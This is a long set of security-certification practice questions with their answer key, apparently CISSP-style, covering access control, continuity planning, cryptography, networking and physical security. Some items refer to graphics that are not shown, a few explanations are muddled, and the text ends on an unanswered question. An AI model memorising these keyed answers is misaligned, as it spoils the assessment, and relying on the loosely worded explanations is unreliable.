B. A vulnerability is a lack or weakness of a control. In this situation the access control may be weak in nature, thus exploitable. The vulnerability is that the user, who must be given access to the sensitive data, is not properly monitored to deter and detect a willful breach of security. The threat is that any internal entity might misuse given access. The risk is the business impact of losing sensitive data. One control that could be put into place is monitoring so that access activities can be closely watched.

Here is a graphic of a business continuity policy. Which component is missing from this graphic? A. Damage assessment phase B. Reconstitution phase C. Business resumption phase D. Continuity of operations plan

B. After a disaster takes place and a company moves out of its facility, it must move back in after the facility is reconstructed. When it is time for the company to move back into its original site or a new site, the company is ready to enter into the reconstitution phase. A company is not out of an emergency state until it is back in operation at the original primary site or a new site that was constructed to replace the primary site, because the company is always vulnerable while operating in a backup facility. Many logistical issues need to be considered as to when a company must return from the alternate site to the original site. The following lists a few of these issues: Ensuring the safety of employees Ensuring an adequate environment is provided (power, facility infrastructure, water, HVAC) Ensuring that the necessary equipment and supplies are present and in working order Ensuring proper communications and connectivity methods are working Properly testing the new environment

Bob is a new security administrator at a financial institution. The organization has experienced some suspicious activity on one of the critical servers that contain customer data. When reviewing how the systems are administered, he uncovers some concerning issues pertaining to remote administration. Which of the following should not be put into place to reduce these concerns? Commands and data should not be sent in cleartext. SSH should be used, not Telnet. Truly critical systems should be administered locally instead of remotely. Only a small number of administrators should be able to carry out remote functionality. Strong authentication should be in place for any administration activities. A. i, ii B. None of them C. ii, iv D. All of them

B. All of these countermeasures should be put into place for proper remote administration activities.

How is a challenge/response protocol utilized with token device implementations? A. This protocol is not used; cryptography is used. B. An authentication service generates a challenge, and the smart token generates a response based on the challenge. C. The token challenges the user for a username and password. D. The token challenges the user's password against a database of stored credentials.

B. An asynchronous token device is based on challenge/response mechanisms. The authentication service sends the user a challenge value, which the user enters into the token. The token encrypts or hashes this value, and the user uses this as her one-time password.

Which of the following is not a characteristic of an electrostatic intrusion detection system? A. It creates an electrostatic field and monitors for a capacitance change. B. It can be used as an intrusion detection system for large areas. C. It produces a balance between the electric capacitance and inductance of an object. D. It can detect if an intruder comes within a certain range of an object.

B. An electrostatic IDS creates an electrostatic field, which is just an electric field associated with static electric charges. The IDS creates a balanced electrostatic field between itself and the object being monitored. If an intruder comes within a certain range of the monitored object, there is capacitance change. The IDS can detect this change and sound an alarm.

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. Relational database B. Object-relational database C. Network database D. Dynamic-static

B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

Nancy is a new network administrator and has been faced with decision of implementing either direct access backup systems or sequential access backup storage devices. Which of the following does not properly describe these types of technologies? A. Any point on a Direct Access Storage Device may be promptly reached, whereas every point in between the current position and the desired position of a sequential access storage device must be traversed in order to reach the desired position. B. Any point of a sequential access storage device may be promptly reached, whereas every point in between the current position and the desired position of a direct access storage device must be traversed in order to reach the desired position. C. Some tape drives have minimal amounts of direct access intelligence built in. D. Tape drives are sequential storage devices.

B. Any point of a sequential access storage device may be promptly reached, whereas every point in between the current position and the desired position of a direct access storage device must be traversed in order to reach the desired position.

Why is it important to preserve the integrity of system logs, and what is the best way to achieve this goal? A. File system instabilities and other software flaws can result in missing or inaccurate audit trails of critical events if the integrity of system logs is not preserved. The best way to preserve integrity is to employ watchdog processes to ensure that the services producing the logs never fail to do so. B. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration to log all critical system activities to a remote log aggregator in real time. C. file system instabilities and other software flaws can result in missing or inaccurate audit trails of critical events if the integrity of system logs is not preserved. The best way to preserve integrity is to export logs to a remote system on an hourly basis. D. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration is to create cryptographic hashes of them as they are produced and recorded on the local system.

B. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration to log all critical system activities to a remote log aggregator in real time.

What should management consider the most when classifying data? A. The type of employees, contractors, and customers who will be accessing the data B. Availability, integrity, and confidentiality C. Assessing the risk level and disabling countermeasures D. The access controls that will be protecting the data

B. Availability, integrity, and confidentiality

Windows and most Linux and Unix systems are based on the DAC model. Which of the following is not true pertaining to the permissions that can be granted? A. Read allows a user to read, but make no changes. B. Change allows a user to read and write only. C. Full control allows a user to read, write, execute, and delete only. D. Change will not allow a non-data owner to modify the object's ACLs

B. Change allows a user to read and write only.

Which class of fire can involve petroleum products and coolants? A. Class A. B. Class B. C. Class C. D. Class D.

B. Class B.

___________ provides for availability and scalability. It groups physically different systems and combines them logically, which helps to provide immunity to faults and improves performance. A. Disc duping B.Clustering C. RAID D. Virtualization

B. Clustering is a fault-tolerant server technology that is similar to redundant servers, except each server takes part in processing services that are requested. A server cluster is a group of servers that are viewed logically as one server to users and can be managed as a single logical system. Clustering provides for availability and scalability. It groups physically different systems and combines them logically, which helps to provide immunity to faults and improves performance. Clusters work as an intelligent unit to balance traffic, and users who access the cluster do not know they may be accessing different systems at different times. To the users, all servers within the cluster are seen as one unit.

All of the following are best practices for controlling the software that is installed and authorized to run in our systems except A. Application whitelisting B. Code reviews C. Gold Masters D. Least privilege

B. Code reviews are focused on finding and fixing defects in software that is undergoing development. It is not helpful in controlling which applications run on our computers.

What does management need to consider the most when classifying data? A. Type of employees, contractors, and customers who will be accessing the data. B. Confidentiality, integrity, and availability. C. First assess the risk level and implement the correct countermeasures. D. The access controls that will be protecting the data.

B. Confidentiality, integrity, and availability.

A symmetric algorithm must have certain characteristics to be considered strong. Which of the following is correct pertaining to these types of characteristics? A. confusion is carried out through transposition, and diffusion is carried out through diffusion. B. Confusion is carried out through substitution, and diffusion is carried out through transposition. C. Confusion and diffusion are both used to increase the work factor. D. The randomness of the cryptoperiod and functions in the algorithm correlate with the level of confusion and diffusion that is provided.

B. Confusion is carried out through substitution, and diffusion is carried out through transposition.

Which of the following best describes what a transaction-processing system provides? A. Redundancy. B. Consistency. C. Confidentiality. D. Availability.

B. Consistency.

Which of the following is not an advantage of using content distribution networks? A. Improved responsiveness to regional users B. Resistance to ARP spoofing attacks C. Customization of content for regional users D. Resistance to DDoS attacks

B. Content distribution networks (CDNs) work by replicating content across geographically dispersed nodes. This means that regional users (those closest to a given node) will see improved responsiveness and could have tailored content delivered to them. It also means that it is much more difficult to mount a successful DDoS attack. An ARP spoofing attack, however, takes place on the local area network and is therefore unrelated to the advantages of CDNs.

There are different categories for evidence depending upon what form it is in and possibly how it was collected. Which of the following is considered supporting evidence? A. Best evidence B. Corroborative evidence C. Conclusive evidence D. Direct evidence

B. Corroborative evidence cannot stand alone, but instead is used as supporting information in a trial. It is often testimony indirectly related to the case but offers enough correlation to supplement the lawyer's argument. The other choices are all types of evidence that can stand alone.

Which is the most valuable technique when determining if a specific security control should be implemented? A.Risk analysis B. Cost/benefit analysis C.ALE results D. identifying the vulnerabilities and threats causing the risk

B. Cost/benefit analysis

Referring to the TCP/IP model, which of the following are application layer protocols? A. IEEE 802.3 Ethernet and PPP B. DNS, DHCP, and SNMP C. TCP and UDP D. IPv4 and IPv6

B. DNS, DHCP, and SNMP

An attacker can modify the client-side JavaScript that provides structured layout and HTML representation. This commonly takes place through form fields within compromised web servers. Which of the following best describes this type of attack? A. Injection attack B. DOM-based XSS C. Persistent XSS D. Session hijacking

B. DOM (Document Object Model)-based XSS vulnerabilities are also referred to as local cross-site scripting. DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim's browser to execute the resulting abusive JavaScript code.

What does DES stand for? A. Data Encryption System B. Data Encryption Standard C. Data Encoding Standard D. Data Encryption Signature

B. Data Encryption Standard was developed by NIST and the NSA to encrypt sensitive but unclassified government data.

Mark is a general manager of a large sporting goods national chain. He manages a Denver store with 50 employees. To keep track of different products that have unique characteristics and coding, Mark sets up multiple inventory databases within his own store. At the end of every quarter, he combines the different databases and analyzes trends to his regular report to the national HQ. What type of database system is Mark using to create his report? A. Data Warehouse. B. Data Mart C. Data Storage. D. Data Mine.

B. Data Mart

Overwriting and/or degaussing are used to clear and purge all of the following except: A. Random access memory B. Data buses C. Secondary storage. D. Magnetic hard disks.

B. Data buses

Which of the following is a true statement pertaining to data encryption when it is used to protect data? A. It verifies the integrity and accuracy of the data. B. It requires careful key management. C. It does not require much system overhead in resources. D. It requires keys to be escrowed.

B. Data encryption always requires careful key management. Most algorithms are so strong today that it is much easier to go after key management than to launch a brute-force attack. Hashing algorithms are used for data integrity, encryption does require a good amount of resources, and keys do not have to be escrowed for encryption.

A network engineer just informed Bob that the parity data for their RAID system has been corrupted. Which of the following best describes the output of this type of situation? A. The hot swappable drive has failed. B. Data from other drives cannot be used to rebuilt lost or corrupted data. C. Three of the five drives cannot be reestablished. D. The mean time to repair just decreased.

B. Data from other drives cannot be used to rebuilt lost or corrupted data.

A fraud analyst with a national insurance company uses database tools every day to help identify violations and identify relationships between the captured data through the uses of rule discovery. These tools help identify relationships among a wide variety of information types. What kind of knowledge discovery in database (KDD) is this considered? A. Probability B. Statistical C. Classification D. Behavioral

B. Data mining is also known as knowledge discovery in database (KDD), which is a combination of techniques used to identify valid and useful patterns. Different types of data can have various interrelationships, and the method used depends on the type of data and patterns that are sought. The following are three approaches used in KDD systems to uncover these patterns: Classification Groups together data according to shared similarities Probabilistic Identifies data interdependencies and applies probabilities to their relationships Statistical Identifies relationships between data elements and uses rule discovery

Which of the following describes object-oriented programming deferred commitment? A. Autonomous objects, which cooperate through exchanges of messages B. The internal components of an object can be refined without changing other parts of the system C. Object-oriented analysis, design, and modeling maps to business needs and solutions D. Other programs using same objects

B. Deferred commitment means that the internal components of an object can be refined without changing other parts of the system. Non-object-oriented programming applications are written as monolithic entities. This means an application is just one big pile of code. If you need to change something in this pile, you would need to go through the whole program's logic functions to figure out what your one change is going to break. If you choose to write your program in an object-oriented language, you don't have one monolithic application, but an application that is made up of smaller components (objects). If you need to make changes or updates to some functionality in your application, you can just change the code within the class that creates the object carrying out that functionality and not worry about everything else the program actually carries out.

Which of the following defines a proper sequence of steps of a data classification program? A. Determine the controls available for various levels of classified data, identify which data can be best protected by them, and assign a data owner to each level. B. Define the classification level, specify the classification criteria, and identify the data owners who will be responsible for deterring classification of the data. C. Identify the data owners, and have them define the classification scheme and determine the necessary controls. D. Document the classification criteria, document the control criteria, and document the expected exceptions.

B. Define the classification level, specify the classification criteria, and identify the data owners who will be responsible for deterring classification of the data.

Which of the following defines a proper sequence of steps of data classification program? A. Determine the controls available for various levels of classified data, identify which data can be best protected by them, and assign a data owner to each level. B. Define the classification levels, specify the classification criteria, and identify the data owners who will be responsible for determining classification data. C. Identify the data owners, and have them define the classification scheme and determine the necessary controls. D. Document the classification criteria, document the control criteria, and document the expected exceptions.

B. Define the classification levels, specify the classification criteria, and identify the data owners who will be responsible for determining classification data.

What is the ultimate purpose of the Trusted Computing Base (TCB)? A. defines the level of security a system provides. B. Defines the level of security assurance a system provides. C. Defines levels of security classifications a system provides. D. Defines security access classifications a system provides.

B. Defines the level of security assurance a system provides.

What is the chief security responsibility of a data owner? A. Determining how the data should be preserved. B. Determining the data classification C. Determining the data value D. Determining how the data will be used.

B. Determining the data classification.

The generation of keys that are made up of random values is referred to as Key Derivation Functions (KDFs). What values are not commonly used in this key generation process? A. Hashing values B. Asymmetric values C. Salts D. Passwords

B. Different values can be used independently or together to play the role of random key material. The algorithm is created to use specific hash, password, and\or salt value, which will go through a certain number of rounds of mathematical functions dictated by the algorithm.

Which of the following provides the correct characteristic for the specific data backup type? A. Differential process backs up the files that have been modified since the last backups B. Differential process backs up the files that have been modified since the last full backup C. Incremental process sets the archive bit to 1 D. Differential process sets the archive bit to 1

B. Differential process backs up the files that have been modified since the last full backup

Which of the following terms describes a system where the user can grant access to resources they own to anyone at any time, and system administrators have the ability to change ownership and permissions on resources as necessary? A. Mandatory access control (MAC) B. Discretionary Access Control (DAC) C. Role-based Access Control (RBAC) D. Rule-based Access Control (or ACLs)

B. Discretionary Access Control (DAC)

Patty is giving a presentation next week to the executive staff of her company. She wants to illustrate the benefits of the company using specific cloud computing solutions. Which of the following does not properly describe one of these benefits or advantages? A. Organizations have more flexibility and agility in IT growth and functionality. B. Cost of computing can be increased since it is a shared delivery model. C. Location independence can be achieved because the computing is not centralized and tied to a physical data center. D. Scalability and elasticity of resources can be accomplished in near real-time through automation.

B. Each of the listed items are correct benefits or characteristics of cloud computing except "Cost of computing can be increased since it is a shared delivery model." The correct answer would be "Cost of computing can be decreased since it is a shared delivery model."

A risk analysis can be carried out through qualitative or quantitative means. It is important to choose the right approach to meet the organization's goals. In a quantitative analysis, which of the following items would not be assigned a numeric value? i.Asset value ii.Threat frequency iii.Severity of vulnerability iv.Impact damage v.Safeguard costs vi.Safeguard effectiveness vii.Probability A. All of them B. None of them C. ii D. vii

B. Each of these items would be assigned a numeric value in a quantitative risk analysis. Each element is quantified and entered into equations to determine total and residual risks. It is more of a scientific or mathematical approach to risk analysis compared to qualitative.

Jack is the CEO of a ticket brokerage house and has called a meeting with his executive team to discuss the rising security concerns that he's been made aware of. After probing his team for answers, jack learns that which of the following entities are his biggest threat? A. External hackers. B. Employees. C. Network partners. D. Equipment Malfunctions.

B. Employees.

Though "something you know," in the form of passwords, is the most common authentication factor still used today, it is considered one of the weakest. This is because passwords are easy for users to share, and relatively easy for adversaries to steal or guess. Which of the following measures is the best way to counter attacks on this form of authentication? A. Store all passwords in encrypted form only, so that recovering them requires a special key to decrypt them for authentication. B. Employ a password policy to ensure that passwords are chosen in such a way that they are neither easy for an attacker to guess nor easy for an attacker to brute force. C. Require that all passwords be composed of a combination of unique characters, regardless of length. D. Ensure that accounts are locked out after a minimum number of incorrect guesses within a short amount of time.

B. Employing a comprehensive password policy is the best method for ensuring that the passwords selected by users are as strong as possible against all forms of attack. This includes making them less easy to guess, by prohibiting the use of strings that are associated with knowable attributes of the user, such as names, birth dates, etc. Passwords should include some amount of complexity beyond simple dictionary words as well, which typically requires the use of some special characters to make them less likely to be brute forcible. Most importantly, they should be required to be as long as is practical given the system implementing them. Password aging and periodic strength audits are also best practices.

operating systems can be programmed to carry out different methods for process isolation. Which of the following refers to a method in which an interface defines how communication can take place between two processes and no process can interact with the other's internal programming code? A. Virtual Mapping. B. Encapsulation of objects. C. Time Multiplexing.. D. Naming Distinctions.

B. Encapsulation of objects.

End-to-end encryption is used by users, and link encryption is used by service providers. Which of the following correctly describes these technologies? A. Link encryption does not encrypt headers and trailers. B. Link encryption encrypts everything but data link messaging. C. End-to-end encryption requires headers to be decrypted at each hop. D. End-to-end encryption encrypts all headers and trailers.

B. Encryption can be performed at different communication levels, each with different types of protection and implications. Two general modes of encryption implementation are link encryption and end-to-end encryption. Link encryption encrypts all the data along a specific communication path, as in a satellite link, T3 line, or telephone circuit. Not only is the user information encrypted, but the header, trailers, addresses, and routing data that are part of the packets are also encrypted. The only traffic not encrypted in this technology is the data link control messaging information, which includes instructions and parameters that the different link devices use to synchronize communication methods. Link encryption provides protection against packet sniffers and eavesdroppers. In end-to-end encryption, the headers, addresses, routing, and trailer information are not encrypted, enabling attackers to learn more about a captured packet and where it is headed. With end-to-end encryption only the data payload is encrypted.

which is not true of counter mode (CTR), which is available to be used in block algorithms? A. Able to preprocess key stream. B. Encryption cannot execute in parallel, unlike OFB. C. Counters increment for each data block. D. Used as part of the IEEE 802.11i standard.

B. Encryption cannot execute in parallel, unlike OFB.

______________, a declarative access control policy language implemented in XML and a processing model, describes how to interpret security policies. _____________ is an XML-based framework being developed by OASIS for exchanging user, resource, and service provisioning information between cooperating organizations. A. Service Provisioning Markup Language (SPML), Extensible Access Control Markup Language (XACML) B. Extensible Access Control Markup Language (XACML), Service Provisioning Markup Language (SPML) C. Extensible Access Control Markup Language (XACML), Security Assertion Markup Language (SAML) D. Security Assertion Markup Language (SAML), Service Provisioning Markup Language (SPML)

B. Extensible Access Control Markup Language (XACML), a declarative access control policy language implemented in XML and a processing model, describes how to interpret security policies. Service Provisioning Markup Language (SPML) is an XML-based framework being developed by OASIS for exchanging user, resource, and service provisioning information between cooperating organizations.

Today, satellites are used to provide wireless connectivity between different locations. What two prerequisites are needed for two different locations to communicate via satellite links? A. They must be connected via a phone line and have access to a modem. B. They must be within the satellite's line of sight and footprint. C. They must have broadband and a satellite in low Earth orbit. D. They must have a transponder and be within the satellite's footprint.

B. For two different locations to communicate via satellite links, they must be within the satellite's line of sight and footprint (area covered by the satellite). The sender of information modulates the data onto a radio signal that is transmitted to the satellite. A transponder on the satellite receives this signal, amplifies it, and relays it to the receiver. The receiver must have a certain type of antenna, which is one of those circular, dish-like components on top of buildings. The antenna contains one or more microwave receivers, depending upon how many satellites it is accepting data from. The size of the footprint depends upon the type of satellite being used. It can be as large as a country or only a few hundred feet in circumference.

There is a specific terminology taxonomy used in the discipline of formal architecture framework development and implementation. Which of the following terms has an incorrect definition? i. Architecture Fundamental organization of a system embodied in its components, their relationships to each other and to the environment, and the principles guiding its design and evolution. ii.Architectural description (AD) Representation of a whole system from the perspective of a related set of concerns. iii.Stakeholder Individual, team, or organization (or classes thereof) with interests in, or concerns relative to, a system. iv.View Collection of document types to convey an architecture in a formal manner. v.Viewpoint A specification of the conventions for constructing and using a view. A template from which to develop individual views by establishing the purposes and audience for a view and the techniques for its creation and analysis. A. i, iii B. ii, iv c. iv, v d. ii

B. Formal enterprise architecture frameworks use the following terms: Architecture Fundamental organization of a system embodied in its components, their relationships to each other and to the environment, and the principles guiding its design and evolution. Architectural description (AD) Collection of document types to convey an architecture in a formal manner. Stakeholder Individual, team, or organization (or classes thereof) with interests in, or concerns relative to, a system. View Representation of a whole system from the perspective of a related set of concerns. Viewpoint A specification of the conventions for constructing and using a view. A template from which to develop individual views by establishing the purposes and audience for a view and the techniques for its creation and analysis.

Tim is a software developer for a financial institution. He develops middleware software code that carries out his company's business logic functions. One of the applications he works with is written in the C programming language and seems to be taking up too much memory as it runs overtime. Which of the following best describes what Tim should implement to rid this software of this type of problem? A. Bounds checking B. Garbage collector C. Parameter checking D. Compiling

B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

Which of the following statements is the most important to understand about physical locks? A. Combination locks can be accessed by the sharing of a secret that can be known by an unknown number of individuals, whereas keyed locks can be accessed by the sharing of a device that can be physically replicated among an unknown number of individuals. B. Given enough unattended time, a sufficiently skilled or determined attacker can bypass any physical lock. C. The grade and strength of the physical characteristics of a lock determine the amount of time that it can be expected to withstand a concentrated attack. D. The grade and strength of the physical characteristics of the components surrounding the lock (hasp, strike, door jam, etc) are as important as the lock itself.

B. Given enough unattended time, a sufficiently skilled or determined attacker can bypass any physical lock.

Which of the following refers to the assessment of a system by someone with only partial knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. Black box testing. D. Blue box testing.

B. Gray box testing.

Which of the following refers to the assessment of a system by someone with only partial knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. black box testing. D. blue box testing.

B. Gray box testing.

Which of the following is a true statement pertaining to markup languages? A. Hypertext Markup Language (HTML) came from Generalized Markup Language (GML), which came from the Standard Generalized Markup Language (SGML). B. Hypertext Markup Language (HTML) came from Standard Generalized Markup Language (SGML), which came from the Generalized Markup Language (GML). C. Standard Generalized Markup Language (SGML) came from the Hypertext Markup Language (HTML), which came from the Generalized Markup Language (GML). D. Standard Generalized Markup Language (SGML) came from the Generalized Markup Language (GML), which came from the Hypertext Markup Language (HTML).

B. HTML came from Standard Generalized Markup Language (SGML), which came from the Generalized Markup Language (GML). A markup language is a way to structure text and how it will be presented. You can control how the text looks and some of the actual functionality the page provides.

Betty has received several e-mail messages from unknown sources that try and entice her to click a specific link using a "Click Here" approach. Which of the following best describes what is most likely taking place in this situation? A. DNS pharming attack B. Embedded hyperlink is obfuscated C. Malware back-door installation D. Bidirectional injection attack

B. HTML documents and e-mails allow users to attach or embed hyperlinks in any given text, such as the "Click Here" links you commonly see in e-mail messages or web pages. Attackers misuse hyperlinks to deceive unsuspecting users into clicking rogue links. The most common approach is known as URL hiding.

When reviewing a reciprocal disaster recovery agreement between two companies, which of the following should be the main concern? A. The soundness of the business impact analysis. B. Hardware and software compatibility. C. Frequency of system testing. D. Differences in business missions.

B. Hardware and software compatibility.

Which problems may be caused by humidity in an area with electrical devices? A. High humidity causes excess electricity, and low humidity causes corrosion. B. High humidity causes corrosion, and low humidity causes static electricity. C. High humidity causes power fluctuations, and low humidity causes static electricity. D. High humidity causes corrosion, and low humidity causes power fluctuations.

B. High humidity can cause corrosion, and low humidity can cause excessive static electricity. Static electricity can short out devices or cause loss of information.

Barry was told that the IDS product that is being used on the network has heuristic capabilities. Which of the following best describes this functionality? A. Gathers packets and reassembles the fragments before assigning anomaly values B. Gathers data to calculate the probability of an attack taking place C. Gathers packets and compares their payload values to a signature engine D. Gathers packet headers to determine if something suspicious is taking place within the network traffic

B. IDS and some antimalware products are said to have "heuristic" capabilities. The term heuristic means to create new information from different data sources. The IDS gathers different "clues" from the network or system and calculates the probability an attack is taking place. If the probability hits a set threshold, then the alarm sounds.

Which of the following does NOT describe IP telephony security? A. VoIP networks should be protected with the same security controls used on a data network. B. Softphones are more secure than IP phones. C. As endpoints, IP phones can become the target of attacks. D. The current Internet architecture over which voice is transmitted is less secure than physical phone lines.

B. IP softphones should be used with caution. A softphone is a software application that allows the user to make phone calls via a computer over the Internet. A softphone, which replaces dedicated hardware, behaves like a traditional telephone. It can be used with a headset connected to a PC's sound card or with a USB phone. Skype is an example of a softphone application. Compared to hardware-based IP phones, softphones make an IP network more vulnerable. However, softphones are no worse than any other interactive Internet application. In addition, data-centered malware can more easily enter a network via softphones because they do not separate voice traffic from data as do IP phones.

Internet Protocol Security (IPSec) is actually a suite of protocols. Each protocol within the suite provides different functionality. Which of the following is not a function or characteristic of IPSec? A. Encryption B. Link layer protection C. Authentication D. Protection of packet payloads and the headers

B. IPSec is a protocol used to provide VPNs that use strong encryption and authentication functionality. It can work in two different modes: tunnel mode (payload and headers are protected) or transport mode (payload protection only). IPSec works at the network layer, not the data link layer.

IPv6 has many new and different characteristics and functionality compared to IPv4. Which of the following is an incorrect functionality or characteristic of IPv6? IPv6 allows for nonscoped addresses, which enables an administrator to restrict specific addresses for specific servers or file and print sharing, for example. IPv6 has IPSec integrated into the protocol stack, which provides application-based secure transmission and authentication. IPv6 has more flexibility and routing capabilities compared to IPv4 and allows for Quality of Service (QoS) priority values to be assigned to time-sensitive transmissions. The protocol offers autoconfiguration, which makes administration much easier compared to IPv4, and it does not require network address translation (NAT) to extend its address space. A.i, iii B. i, ii C. ii, iii D. ii, iv

B. IPv6 allows for scoped addresses, which enables an administrator to restrict specific addresses for specific servers or file and print sharing, for example. IPv6 has IPSec integrated into the protocol stack, which provides end-to-end secure transmission and authentication.

All of the following should be considered as part of the supply chain risk management process for a smartphone manufacturer except A. Hardware Trojans inserted by downstream partners B. ISO/IEC 27001 C. Hardware Trojans inserted by upstream partners D. NIST Special Publication 800-161

B. ISO/IEC 27001 is a standard covering information security management systems, which is a much broader topic than supply chain risk management. The other three options are better answers because they are directly tied to this process: NIST's Special Publication 800-161 directly addresses supply chain risk, and the insertion of hardware Trojans could happen at any point in the chain.

Which of the following is true of a qualitative risk analysis approach? A. Results are definitive and objective in nature. B. Identifies major areas of risk. C. Expected loss is given in the form of dollars and cents. D. Results are often complex.

B. Identifies major areas of risk.

Which of the following best describes some of the issues that the evaluation testers most likely ran into while testing the submitted product? A. Nonprotected ROM sections B. Vulnerabilities that allowed malicious code to execute in protected memory sections C. Lack of a predefined and implemented trusted computing base D. Lack of a predefined and implemented security kernel

B. If testers suggested to the team that address space layout randomization and data execution protection should be integrated, this is most likely because the system allows for malicious code to easily execute in memory sections that would be dangerous to the system. These are both memory protection approaches.

When a CPU is passed an instruction set and data to be processed and the program status word (PSW) register contains a value indicating that execution should take place in privileged mode, which of the following would be considered true? A. Operating system is executing in supervisory mode. B. Request came from a trusted process. C. Functionality that is available in user mode is not available. D. An untrusted process submitted the execution request.

B. If the PSW has a bit value that indicates the instructions to be executed should be carried out in privileged mode, this means a trusted process (e.g., an operating system process) made the request and can have access to the functionality that is not available in user mode.

All of the following are normally legitimate reasons to suspend rather than delete user accounts except A. Regulatory compliance B. Protection of the user's privacy C. Investigation of a subsequently discovered event D. Data retention policy

B. If the organization was intentionally attempting to protect the privacy of its users, suspension of the account would be a poor privacy measure compared to outright deletion.

When protecting information assets, which of the following security controls is most effective for data in motions? A. requiring whole-disk encryption for all devices with the advanced encryption standard (aes). B. Implementing encryption with transport layer security or ipsec. C. Implementing whole-memory encryption with the storage keys in cpu registers. D. Requiring the use of next-generation firewalls (NGFWS) and/or network-based intrusion prevention systems (nips)

B. Implementing encryption with transport layer security or ipsec.

Crime Prevention Through Environmental Design (CPTED) provides a different approach than a target hardening approach. Which of the following is an example of target hardening? A. hedges and planters around a facility should not be higher than 2.5 feet tall, so they cannot be used to gain access to a window. B. Implementing locks and alarms to delay and detect intrusions. C. Street furnishings (benches and tables) encourage people to sit and watch what is going on around them, which discourages criminal activity. D. CCTV cameras are mounted in full view, so criminals know their activities will be captured.

B. Implementing locks and alarms to delay and detect intrusions.

Use the following scenario to answer Questions 61-62. Jim works for a large energy company. His senior management just conducted a meeting with Jim's team with the purpose of reducing IT costs without degrading their security posture. The senior management decided to move all administrative systems to a cloud provider. These systems are proprietary applications currently running on Linux servers. Which of the following services would allow Jim to transition all administrative custom applications to the cloud while leveraging the service provider for security and patching of the cloud platforms? A. IaaS B. PaaS C. SaaS D. IDaaS

B. In a Platform as a Service (PaaS) contract, the service provider normally takes care of all configuration, patches, and updates for the virtual platform. Jim would only have to worry about porting the applications and running them.

In practical use, which of the following best describes a "session"? A. Any data exchange between two discrete endpoints, over any arbitrary duration B. Any authenticated exchange between two parties that is used to carry on a conversation, with a discrete beginning, period of activity, and termination C. Any discrete period of time that a user is logged into a workstation D. The volume of data exchanged between two systems during a discrete period of time

B. In most practical uses of the word, a "session" implies some initial form of authentication between two parties, be it between a user and a workstation or between two systems on a network. Subsequent to the authentication phase at the session's initiation, the two parties carry on an exchange of data interactively, and then terminate the exchange when the session is no longer required, most commonly through mutual agreement. A session therefore has a discrete beginning, period of interactive activity, and a discrete termination.

What object-oriented programming term or concept is illustrated in the graphic that follows? A. Methods B. Messages C. Abstraction D. Data hiding

B. In object-oriented programming objects need to be able to communicate with each other, and this happens by using messages that are sent to the receiving object's application program interface (API). For example, if object A needs to tell object B that a user's checking account must be reduced by $40, it sends object B a message. The message is made up of the destination, the method that needs to be performed, and the corresponding arguments. This graphic illustrates object communication through the use of their messaging functionality.

Use the following scenario to answer Questions 24-26. Grace is a security administrator for a medical institution and is responsible for many different teams. One team has reported that when their main FDDI connection failed, three critical systems went offline even though the connection was supposed to provide redundancy. Grace has to also advise her team on the type of fiber that should be implemented for campus building-to-building connectivity. Since this is a medical training facility, many surgeries are video recorded and that data must continuously travel from one building to the next. One other thing that has been reported to Grace is that periodic DoS attacks take place against specific servers within the internal network. The attacker sends excessive ICMP Echo Request packets to all the hosts on a specific subnet, which is aimed at one specific server. Which of the following is the best type of fiber that should be implemented in this scenario? A. Single mode B. Multimode C. Optical carrier D. SONET

B. In single mode, a small glass core is used for high-speed data transmission over long distances. This scenario specifies campus building-to-building connections, which are usually short distances. In multimode, a large glass core is used and is able to carry more data than single-mode fibers, though they are best for shorter distances because of their higher attenuation levels.

Lynn logs into a website and purchases an airline ticket for her upcoming trip. The website also offers her pricing and package deals for hotel rooms and rental cars while she is completing her purchase. The airline, hotel, and rental companies are all separate and individual companies. Lynn decides to purchase her hotel room through the same website at the same time. The website is using Security Assertion Markup Language to allow for this type of federated identity management functionality. In this example which entity is the principal, which entity is the identity provider, and which entity is the service provider? A. Portal, Lynn, hotel company B. Lynn, airline company, the hotel company C. Lynn, hotel company, airline company D. Portal, Lynn, airline company

B. In this scenario, Lynn is considered the principal, the airline company is considered the identity provider, and the hotel company that receives the user's authentication information from the airline company web server is considered the service provider. Security Assertion Markup Language (SAML) provides the authentication pieces to federated identity management systems to allow business-to-business (B2B) and business-to-consumer (B2C) transactions.

Electrical power is being provided more through smart grids, which allow for self-healing, resistance to physical and cyberattacks, increased efficiency, and better integration of renewable energy sources. Countries want their grids to be more reliable, resilient, flexible, and efficient Why does this type of evolution in power infrastructure concern many security professionals? A. allows for direct attacks through power over ethernet. B. Increases embedded software and computing capabilities. C. Does not have proper protection agains common web-based attacks. D. Power fluctuation and outages directly affect computing systems.

B. Increases embedded software and computing capabilities.

Mirroring of drives is when data is written to two drives at once for redundancy purposes. What similar type of technology is shown in the graphic that follows? A. Direct access storage B. Disk duplexing C. Striping D. Massive array of inactive disks

B. Information that is required to always be available should be mirrored or duplexed. In both mirroring (also known as RAID 1) and duplexing, every data write operation occurs simultaneously or nearly simultaneously in more than one physical place. The distinction between mirroring and duplexing is that with mirroring the two (or more) physical places where the data is written may be attached to the same controller, leaving the storage still subject to the single point of failure of the controller itself; in duplexing, two or more controllers are used.

What is the purpose of polyinstantiation? A. To restrict lower-level subjects from accessing low-level information B. To make a copy of an object and modify the attributes of the second copy C. To create different objects that will react in different ways to the same input D. To create different objects that will take on inheritance attributes from their class

